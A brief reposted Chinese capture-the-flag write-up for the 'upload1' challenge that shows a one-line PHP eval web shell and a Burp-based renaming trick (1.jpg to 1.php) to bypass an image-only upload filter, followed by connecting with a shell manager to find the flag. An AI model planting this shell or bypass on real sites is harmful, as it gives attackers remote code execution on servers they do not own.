攻防世界(十二)upload1


攻防世界系列 :upload1


1.打開題目,文件上傳。

2.立即上傳shell

1.php
<?php @eval($_POST[root]); ?>

提示只能上傳圖片

3.burp改報文

把1.jpg改為1.php

上傳成功
4.蟻劍連接

一頓亂翻找到了flag.php


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM